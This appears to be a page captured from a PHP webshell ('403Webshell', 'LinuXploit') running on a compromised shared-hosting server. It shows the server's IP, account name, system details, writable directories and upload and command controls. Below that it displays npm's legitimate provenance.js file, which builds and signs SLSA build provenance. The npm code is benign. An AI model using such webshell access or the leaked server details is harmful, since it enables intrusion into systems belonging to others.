403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.143.17.90
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/self/root/proc/thread-self/root/opt/alt/alt-nodejs19/root/lib/node_modules/npm/node_modules.bundled/libnpmpublish/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/self/root/proc/self/root/proc/thread-self/root/opt/alt/alt-nodejs19/root/lib/node_modules/npm/node_modules.bundled/libnpmpublish/lib/provenance.js
const { sigstore } = require('sigstore')

const INTOTO_PAYLOAD_TYPE = 'application/vnd.in-toto+json'
const INTOTO_STATEMENT_TYPE = 'https://in-toto.io/Statement/v0.1'
const SLSA_PREDICATE_TYPE = 'https://slsa.dev/provenance/v0.2'

const BUILDER_ID = 'https://github.com/actions/runner'
const BUILD_TYPE_PREFIX = 'https://github.com/npm/cli/gha'
const BUILD_TYPE_VERSION = 'v2'

const generateProvenance = async (subject, opts) => {
  const { env } = process
  /* istanbul ignore next - not covering missing env var case */
  const [workflowPath] = (env.GITHUB_WORKFLOW_REF || '')
    .replace(env.GITHUB_REPOSITORY + '/', '')
    .split('@')
  const payload = {
    _type: INTOTO_STATEMENT_TYPE,
    subject,
    predicateType: SLSA_PREDICATE_TYPE,
    predicate: {
      buildType: `${BUILD_TYPE_PREFIX}/${BUILD_TYPE_VERSION}`,
      builder: { id: BUILDER_ID },
      invocation: {
        configSource: {
          uri: `git+${env.GITHUB_SERVER_URL}/${env.GITHUB_REPOSITORY}@${env.GITHUB_REF}`,
          digest: {
            sha1: env.GITHUB_SHA,
          },
          entryPoint: workflowPath,
        },
        parameters: {},
        environment: {
          GITHUB_EVENT_NAME: env.GITHUB_EVENT_NAME,
          GITHUB_REF: env.GITHUB_REF,
          GITHUB_REPOSITORY: env.GITHUB_REPOSITORY,
          GITHUB_REPOSITORY_ID: env.GITHUB_REPOSITORY_ID,
          GITHUB_REPOSITORY_OWNER_ID: env.GITHUB_REPOSITORY_OWNER_ID,
          GITHUB_RUN_ATTEMPT: env.GITHUB_RUN_ATTEMPT,
          GITHUB_RUN_ID: env.GITHUB_RUN_ID,
          GITHUB_SHA: env.GITHUB_SHA,
          GITHUB_WORKFLOW_REF: env.GITHUB_WORKFLOW_REF,
          GITHUB_WORKFLOW_SHA: env.GITHUB_WORKFLOW_SHA,
        },
      },
      metadata: {
        buildInvocationId: `${env.GITHUB_RUN_ID}-${env.GITHUB_RUN_ATTEMPT}`,
        completeness: {
          parameters: false,
          environment: false,
          materials: false,
        },
        reproducible: false,
      },
      materials: [
        {
          uri: `git+${env.GITHUB_SERVER_URL}/${env.GITHUB_REPOSITORY}@${env.GITHUB_REF}`,
          digest: {
            sha1: env.GITHUB_SHA,
          },
        },
      ],
    },
  }

  return sigstore.attest(Buffer.from(JSON.stringify(payload)), INTOTO_PAYLOAD_TYPE, opts)
}

module.exports = {
  generateProvenance,
}

Youez - 2016 - github.com/yon3zu
LinuXploit